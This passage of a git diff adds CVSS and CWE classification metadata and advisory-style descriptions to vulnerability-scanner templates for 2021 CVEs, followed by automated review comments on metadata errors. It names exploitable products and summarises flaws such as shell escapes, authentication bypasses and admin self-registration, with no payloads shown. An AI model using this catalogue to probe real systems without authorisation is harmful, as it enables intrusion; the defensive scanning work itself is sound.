--- a/cves/2021/CVE-2021-31249.yaml +++ b/cves/2021/CVE-2021-31249.yaml @@ -7,6 +7,10 @@ info: reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249 severity: medium tags: cve,cve2021,chiyu,crlf,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.50 + cve-id: CVE-2021-31249 requests: - method: GET diff --git a/cves/2021/CVE-2021-31250.yaml b/cves/2021/CVE-2021-31250.yaml index f03536d032..da104e45c7 100644 --- a/cves/2021/CVE-2021-31250.yaml +++ b/cves/2021/CVE-2021-31250.yaml @@ -7,6 +7,11 @@ info: reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250 severity: medium tags: cve,cve2021,chiyu,xss,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.40 + cve-id: CVE-2021-31250 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml index 8a0135ebcb..30d25808bb 100644 --- a/cves/2021/CVE-2021-3129.yaml +++ b/cves/2021/CVE-2021-3129.yaml @@ -9,6 +9,10 @@ info: - https://www.ambionics.io/blog/laravel-debug-rce - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129 tags: cve,cve2021,laravel,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-3129 requests: - raw: diff --git a/cves/2021/CVE-2021-31537.yaml b/cves/2021/CVE-2021-31537.yaml index 0e40527eea..10abaf9ffe 100644 --- a/cves/2021/CVE-2021-31537.yaml +++ b/cves/2021/CVE-2021-31537.yaml @@ -7,6 +7,11 @@ info: reference: https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/ severity: medium tags: cve,cve2021,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-31537 + cwe-id: CWE-79 requests: - method: GET 
diff --git a/cves/2021/CVE-2021-31581.yaml b/cves/2021/CVE-2021-31581.yaml index 4239a6763e..9da45f7140 100644 --- a/cves/2021/CVE-2021-31581.yaml +++ b/cves/2021/CVE-2021-31581.yaml @@ -8,6 +8,12 @@ info: - https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/ severity: medium tags: cve,cve2021,akkadian,mariadb,disclosure + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.40 + cve-id: CVE-2021-31581 + cwe-id: CWE-312 + description: "The restricted shell provided by Akkadian Provisioning Manager Engine (PME) can be escaped by abusing the 'Edit MySQL Configuration' command. This command launches a standard vi editor interface which can then be escaped. This issue was resolved in Akkadian OVA appliance version 3.0 (and later), Akkadian Provisioning Manager 5.0.2 (and later), and Akkadian Appliance Manager 3.3.0.314-4a349e0 (and later)." requests: - method: GET diff --git a/cves/2021/CVE-2021-31755.yaml b/cves/2021/CVE-2021-31755.yaml index 71be85cd28..66ef428473 100644 --- a/cves/2021/CVE-2021-31755.yaml +++ b/cves/2021/CVE-2021-31755.yaml @@ -9,6 +9,11 @@ info: - https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3 - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai tags: cve,cve2021,tenda,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-31755 + cwe-id: CWE-787 requests: - raw: diff --git a/cves/2021/CVE-2021-31856.yaml b/cves/2021/CVE-2021-31856.yaml index deb18ee2f2..86cd3cb7a1 100644 --- a/cves/2021/CVE-2021-31856.yaml +++ b/cves/2021/CVE-2021-31856.yaml @@ -9,6 +9,11 @@ info: - https://github.com/ssst0n3/CVE-2021-31856 - https://nvd.nist.gov/vuln/detail/CVE-2021-31856 tags: sqli,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-31856 + cwe-id: CWE-89 requests: - method: GET 
diff --git a/cves/2021/CVE-2021-32030.yaml b/cves/2021/CVE-2021-32030.yaml index 47b367c664..5918a5c871 100644 --- a/cves/2021/CVE-2021-32030.yaml +++ b/cves/2021/CVE-2021-32030.yaml @@ -3,10 +3,15 @@ id: CVE-2021-32030 info: name: ASUS GT-AC2900 - Authentication Bypass author: gy741 - severity: high + severity: critical description: The administrator application on ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator interface. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations. reference: https://www.atredis.com/blog/2021/4/30/asus-authentication-bypass tags: cve,cve2021,asus,auth-bypass,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-32030 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2021/CVE-2021-3223.yaml b/cves/2021/CVE-2021-3223.yaml index 801dd5b095..31a095515f 100644 --- a/cves/2021/CVE-2021-3223.yaml +++ b/cves/2021/CVE-2021-3223.yaml @@ -9,6 +9,11 @@ info: - https://github.com/node-red/node-red-dashboard/issues/669 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223 tags: cve,cve2020,node-red-dashboard,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-3223 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-32305.yaml b/cves/2021/CVE-2021-32305.yaml index 70f2fb7787..c85b8eac3a 100644 --- a/cves/2021/CVE-2021-32305.yaml +++ b/cves/2021/CVE-2021-32305.yaml 
@@ -9,6 +9,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-32305 - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html tags: cve,cve2021,websvn,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-32305 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2021/CVE-2021-32819.yaml b/cves/2021/CVE-2021-32819.yaml index 3b08cefdd4..455e65993d 100644 --- a/cves/2021/CVE-2021-32819.yaml +++ b/cves/2021/CVE-2021-32819.yaml @@ -3,7 +3,7 @@ id: CVE-2021-32819 info: name: Nodejs squirrelly template engine RCE author: pikpikcu - severity: critical + severity: high description: | Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is @@ -13,6 +13,10 @@ info: - https://www.linuxlz.com/aqld/2331.html - https://blog.diefunction.io/vulnerabilities/ghsl-2021-023 tags: cve,cve2021,nodejs,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-32819 requests: - method: GET diff --git a/cves/2021/CVE-2021-32820.yaml b/cves/2021/CVE-2021-32820.yaml index 3c91c1e2a2..99daa3b409 100644 --- a/cves/2021/CVE-2021-32820.yaml +++ b/cves/2021/CVE-2021-32820.yaml 
@@ -3,11 +3,17 @@ id: CVE-2021-32820 info: name: Express-handlebars Path Traversal author: dhiyaneshDk - severity: medium + severity: high reference: - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/ - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json tags: cve,cve2021,expressjs,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.60 + cve-id: CVE-2021-32820 + cwe-id: CWE-200 + description: "Express-handlebars is a Handlebars view engine for Express. Express-handlebars mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extentions (i.e. file.extension) can be included, files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability." requests: - method: GET diff --git a/cves/2021/CVE-2021-3297.yaml b/cves/2021/CVE-2021-3297.yaml index ae2f69e33a..801f92c40d 100644 --- a/cves/2021/CVE-2021-3297.yaml +++ b/cves/2021/CVE-2021-3297.yaml @@ -8,6 +8,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-3297 - https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass tags: cve,cve2021,zyxel,auth-bypass,router + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.80 + cve-id: CVE-2021-3297 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2021/CVE-2021-33221.yaml b/cves/2021/CVE-2021-33221.yaml index b64016ff6a..9b713950a9 100644 --- a/cves/2021/CVE-2021-33221.yaml +++ b/cves/2021/CVE-2021-33221.yaml 
@@ -5,8 +5,13 @@ info: author: geeknik description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices use for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens). reference: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf - severity: medium + severity: critical tags: cve,cve2021,commscope,ruckus,debug + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-33221 + cwe-id: CWE-306 requests: - method: GET diff --git a/cves/2021/CVE-2021-33564.yaml b/cves/2021/CVE-2021-33564.yaml index a2bbd5d431..b6b1e0781e 100644 --- a/cves/2021/CVE-2021-33564.yaml +++ b/cves/2021/CVE-2021-33564.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/ tags: cve,cve2021,rce,ruby + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-33564 + cwe-id: CWE-88 + description: "An argument injection vulnerability in the Dragonfly gem before 1.4.0 for Ruby allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility." requests: - method: GET diff --git a/cves/2021/CVE-2021-3374.yaml b/cves/2021/CVE-2021-3374.yaml index a337b419ae..8446f3f830 100644 --- a/cves/2021/CVE-2021-3374.yaml +++ b/cves/2021/CVE-2021-3374.yaml 
@@ -7,6 +7,11 @@ info: reference: https://github.com/colemanjp/rstudio-shiny-server-directory-traversal-source-code-leak severity: medium tags: cve,cve2021,rstudio,traversal + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-3374 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml index 1b44686e3e..58c38c5802 100644 --- a/cves/2021/CVE-2021-3377.yaml +++ b/cves/2021/CVE-2021-3377.yaml @@ -9,6 +9,11 @@ info: author: geeknik severity: medium tags: cve,cve2021,xss,npm + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-3377 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2021/CVE-2021-3378.yaml b/cves/2021/CVE-2021-3378.yaml index f39c826555..80215a832b 100644 --- a/cves/2021/CVE-2021-3378.yaml +++ b/cves/2021/CVE-2021-3378.yaml @@ -10,6 +10,11 @@ info: via insecure POST request. It has been tested on version 4.4.2.2 in Windows 10 Enterprise. tags: cve,cve2021,fortilogger,fortigate,fortinet + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-3378 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2021/CVE-2021-33807.yaml b/cves/2021/CVE-2021-33807.yaml index 7ffb782090..4cee9b0a73 100644 --- a/cves/2021/CVE-2021-33807.yaml +++ b/cves/2021/CVE-2021-33807.yaml @@ -9,6 +9,11 @@ info: - https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807 tags: cve,cve2021,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-33807 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-33904.yaml b/cves/2021/CVE-2021-33904.yaml index cdb7130cd7..1e62c84265 100644 --- a/cves/2021/CVE-2021-33904.yaml +++ b/cves/2021/CVE-2021-33904.yaml 
@@ -7,6 +7,11 @@ info: reference: https://www.exploit-db.com/exploits/49980 severity: medium tags: cve,cve2021,accela,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-33904 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-34370.yaml b/cves/2021/CVE-2021-34370.yaml index a920b1c540..0e34c5c406 100644 --- a/cves/2021/CVE-2021-34370.yaml +++ b/cves/2021/CVE-2021-34370.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-34370 - https://www.accela.com/civic-platform/ tags: xss,redirect,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-34370 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-34429.yaml b/cves/2021/CVE-2021-34429.yaml index 726f1cffae..fa1c651a3a 100644 --- a/cves/2021/CVE-2021-34429.yaml +++ b/cves/2021/CVE-2021-34429.yaml @@ -9,6 +9,11 @@ info: reference: - https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm tags: cve,cve2021,jetty + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-34429 + cwe-id: CWE-200 requests: - raw: diff --git a/cves/2021/CVE-2021-34473.yaml b/cves/2021/CVE-2021-34473.yaml index 5a10ae6168..68a4fd2b38 100644 --- a/cves/2021/CVE-2021-34473.yaml +++ b/cves/2021/CVE-2021-34473.yaml @@ -11,6 +11,10 @@ info: - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 tags: cve,cve2021,ssrf,rce,exchange + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-34473 requests: - method: GET diff --git a/cves/2021/CVE-2021-34621.yaml b/cves/2021/CVE-2021-34621.yaml index 9a97a4f4e5..4362823530 100644 --- a/cves/2021/CVE-2021-34621.yaml 
+++ b/cves/2021/CVE-2021-34621.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin tags: cve,cve2021,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-34621 + cwe-id: CWE-269 + description: "A vulnerability in the user registration component found in the ~/src/Classes/RegistrationAuth.php file of the ProfilePress WordPress plugin made it possible for users to register on sites as an administrator. This issue affects versions 3.0.0 - 3.1.3. ." requests: - raw: diff --git a/cves/2021/CVE-2021-35464.yaml b/cves/2021/CVE-2021-35464.yaml index f3e3f41ee9..a7800fd3ac 100644 --- a/cves/2021/CVE-2021-35464.yaml +++ b/cves/2021/CVE-2021-35464.yaml @@ -12,6 +12,11 @@ info: tags: cve,cve2021,openam,rce,java reference: - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-35464 + cwe-id: CWE-502 requests: - method: GET diff --git a/cves/2021/CVE-2021-36380.yaml b/cves/2021/CVE-2021-36380.yaml index 7030f465af..afdeff9e10 100644 --- a/cves/2021/CVE-2021-36380.yaml +++ b/cves/2021/CVE-2021-36380.yaml @@ -8,6 +8,11 @@ info: reference: - https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/ tags: cve,cve2021,sureline,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-36380 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2021/CVE-2021-37216.yaml b/cves/2021/CVE-2021-37216.yaml index 33de2b4095..de96cad6d0 100644 --- a/cves/2021/CVE-2021-37216.yaml +++ b/cves/2021/CVE-2021-37216.yaml 
@@ -10,6 +10,11 @@ info: reference: https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html severity: medium tags: cve,cve2021,xss,qsan + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-37216 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-37538.yaml b/cves/2021/CVE-2021-37538.yaml index 758e66491c..c7327b670e 100644 --- a/cves/2021/CVE-2021-37538.yaml +++ b/cves/2021/CVE-2021-37538.yaml @@ -3,12 +3,17 @@ id: CVE-2021-37538 info: name: PrestaShop SmartBlog SQL Injection author: whoever - severity: high + severity: critical description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection in the blog archive functionality. tags: cve,cve2021,prestashop,smartblog,sqli reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37538 - https://blog.sorcery.ie/posts/smartblog_sqli/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-37538 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2021/CVE-2021-37573.yaml b/cves/2021/CVE-2021-37573.yaml index 6c9c42fe15..aa50dba941 100644 --- a/cves/2021/CVE-2021-37573.yaml +++ b/cves/2021/CVE-2021-37573.yaml @@ -7,6 +7,12 @@ info: reference: - https://seclists.org/fulldisclosure/2021/Aug/13 tags: cve,cve2021,xss,tjws + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-37573 + cwe-id: CWE-79 + description: "A reflected cross-site scripting (XSS) vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's \"404 Page not Found\" error page" requests: - method: GET diff --git a/cves/2021/CVE-2021-37704.yaml b/cves/2021/CVE-2021-37704.yaml index f9424b16b2..cefb540971 100644 --- a/cves/2021/CVE-2021-37704.yaml +++ b/cves/2021/CVE-2021-37704.yaml 
@@ -3,12 +3,17 @@ id: CVE-2021-37704 info: name: phpfastcache phpinfo exposure author: whoever - severity: low + severity: medium description: phpinfo() exposure in unprotected composer vendor folder via phpfastcache/phpfastcache. tags: cve,cve2021,exposure,phpfastcache reference: https://github.com/PHPSocialNetwork/phpfastcache/pull/813 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2021-37704 + cwe-id: CWE-668 requests: - method: GET diff --git a/cves/2021/CVE-2021-38702.yaml b/cves/2021/CVE-2021-38702.yaml index c17a52845f..cf51a9d3b3 100644 --- a/cves/2021/CVE-2021-38702.yaml +++ b/cves/2021/CVE-2021-38702.yaml @@ -7,6 +7,11 @@ info: description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow for reflected Cross Site Scripting via the 'u' parameter of ft.php. reference: https://seclists.org/fulldisclosure/2021/Aug/20 tags: cve,cve2021,cyberoam,netgenie,xss,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-38702 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-38751.yaml b/cves/2021/CVE-2021-38751.yaml index 209200dcb3..f65c7095ad 100644 --- a/cves/2021/CVE-2021-38751.yaml +++ b/cves/2021/CVE-2021-38751.yaml @@ -13,6 +13,11 @@ info: - https://github.com/exponentcms/exponent-cms/issues/1544 - https://github.com/exponentcms/exponent-cms/blob/a9fa9358c5e8dc2ce7ad61d7d5bea38505b8515c/exponent_constants.php#L56-L64 tags: cve,cve2021,exponentcms + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.30 + cve-id: CVE-2021-38751 + cwe-id: CWE-116 requests: - method: GET
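Review bot: in cves/2021/CVE-2021-27132.yaml the cybertuz.com URL is moved into the new `reference:` list but is still left at the end of the `description` text, so it now appears twice; remove it from the description. The second entry, `http://sercomm.com`, is a vendor home page rather than an advisory and does not help anyone verify the finding. The severity also goes from medium to critical on a 9.80 vector for a CRLF injection, so the commit message should name the source of that score.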
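Review bot: in cves/2021/CVE-2021-27651.yaml the line `cwe-id: CWE-287,CWE-640` packs two identifiers into one scalar, while every other classification block in this patch carries a single CWE. Confirm that whatever consumes `classification` splits on the comma; otherwise filtering on CWE-287 or CWE-640 alone will miss this template.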
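Review bot: the classification block added to cves/2021/CVE-2021-26855.yaml has no `cwe-id`, and the same holds for CVE-2021-3017, CVE-2021-31249, CVE-2021-3129, CVE-2021-32819 and CVE-2021-34473 in this patch. If the omission is deliberate because no CWE is assigned upstream, say so in the commit message; otherwise add the field so that reports grouped by `cwe-id` do not silently drop these templates. For CVE-2021-31249 the `crlf` tag suggests checking whether the CWE-74 used for the Sercomm CRLF template applies here too.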
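Review bot: in cves/2021/CVE-2021-31581.yaml the added `description` does not describe what the template checks. The text is about escaping a restricted shell through the vi editor, and the vector is `AV:L/.../PR:H`, yet the template is tagged `mariadb,disclosure` and sends an unauthenticated `GET`. Either write a description that matches the exposure the request detects, or confirm that the CVE id on this template is the right one. The `description` key is also placed after `classification`, unlike the other templates, where it sits with the rest of the `info` fields.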
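Review bot: in cves/2021/CVE-2021-3223.yaml the context line `tags: cve,cve2020,node-red-dashboard,lfi` carries the wrong year tag for a template under cves/2021 with `cve-id: CVE-2021-3223`. Since this hunk already edits the `info` block, fix the tag to `cve2021` here so that tag-based scans for 2021 CVEs pick the template up.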
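Review bot: in cves/2021/CVE-2021-32820.yaml the added description misspells "extensions" as "extentions". The template is named "Express-handlebars Path Traversal" and tagged `lfi`, but the block uses `cwe-id: CWE-200`, while the other traversal and LFI templates in this patch (CVE-2021-3019, CVE-2021-3223, CVE-2021-33807) use CWE-22; check which one is intended. The severity change from medium to high depends on `S:C` in the vector, which is worth a sentence in the commit message.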
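Review bot: in cves/2021/CVE-2021-3297.yaml the vector starts with `AV:L/AC:L/PR:L`, although the template is tagged `auth-bypass,router` and is a raw HTTP request, which is a network check with no prior privileges. CVE-2021-28150 in this patch has the same `AV:L` on an HTTP template. If these vectors were copied as published, note that in the commit message; if not, recheck them, because the score drives how findings from these templates are triaged.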
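Review bot: in cves/2021/CVE-2021-33221.yaml the severity jumps from medium to critical on a `C:H/I:H/A:H` vector, but the existing description only covers unauthenticated disclosure of system and configuration information, with nothing about integrity or availability impact. Confirm the vector against the CVE record, and if it stands, extend the description so the critical rating is explained to whoever reads the scan result.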
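Review bot: in cves/2021/CVE-2021-34621.yaml the added description ends with `3.0.0 - 3.1.3. ."`, leaving a stray space and a second period before the closing quote. Trim it to end at `3.1.3.` so that the text renders cleanly in reports.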
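Review bot: in cves/2021/CVE-2021-37573.yaml the added description reads "TTiny Java Web Server", which should be "Tiny Java Web Server" to match the TJWS acronym that follows it, and the sentence has no final period. The escaped quotes around `\"404 Page not Found\"` are valid inside the double-quoted scalar, so nothing else needs to change.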
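Review bot: in cves/2021/CVE-2021-37704.yaml the `reference:` key just above the new block holds two URLs with no `-` list markers, so YAML folds them into a single string instead of two references. Since this hunk rewrites the surrounding `info` fields, convert the value to a two-item list in the same change. The severity bump from low to medium matches the 4.30 score.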